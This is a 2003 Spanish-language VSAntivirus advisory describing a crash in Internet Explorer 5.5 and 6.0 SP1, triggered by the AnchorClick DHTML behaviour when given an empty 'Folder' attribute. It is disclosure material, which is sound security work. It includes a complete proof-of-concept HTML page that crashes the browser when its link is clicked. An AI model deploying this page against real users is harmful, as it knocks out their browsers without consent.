Controlado desde el
19/10/97 por NedStat
|
| Crash en Internet Explorer (AnchorClick Behaviour)
|
| |
VSantivirus No. 1033, Año 7, Martes 6 de mayo de 2003
Crash en Internet Explorer (AnchorClick Behaviour)
http://www.vsantivirus.com/dfm-vul-anchor-ie.htm
Por David F. Madrid
idoru@videosoft.net.uy
Asunto: Crash en Internet Explorer (AnchorClick Behaviour)
Versiones Afectadas: IE 5.5, IE 6.0 SP1
Microsoft fue avisado y anuncia que será corregido en el próximo Service Pack
Descripción:
Internet Explorer permite el uso de "behaviours" (comportamientos) DHTML que permiten modificar las propiedades de un TAG HTML (línea de código).
Uno de los "behaviours" asociados al tag "A" (enlace) llamado "AnchorClick" permite especificar una URL para el enlace alternativa a la especificada en el atributo "href" mediante la propiedad "Folder".
Si este campo se deja vacío ("") el programa se cerrará con una violación de acceso al intentar escribir en un puntero nulo.
Esto puede ser comprobado pulsando el enlace que resulta de este código HTML:
<HTML>
<head><title>Vulnerabilidad en iexplorer .
AnchorClick Behaviour </title>
<STYLE>
A {behavior:url(#default#AnchorClick);}
</STYLE>
</head>
<body>
<A href = "folder.htm" FOLDER = "">
Pulsa aquí </a>
</body>
</html>
Glosario:
TAGS (Rótulo) - Códigos de formateo utilizados en documentos HTML que dan instrucciones al navegador sobre la presentación de texto y de gráficos en una página web.
URL (Uniform Resources Locator o Localizador Uniforme de Recursos) - Básicamente solemos referirnos a cualquier dirección de Internet. En realidad se trata de una estandarización de recursos que permite encontrar estas direcciones. Dicho de otra manera, se trata de un "apuntador" a la ubicación de cualquier archivo, como por ejemplo una página HTML.
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
|
 
|
|
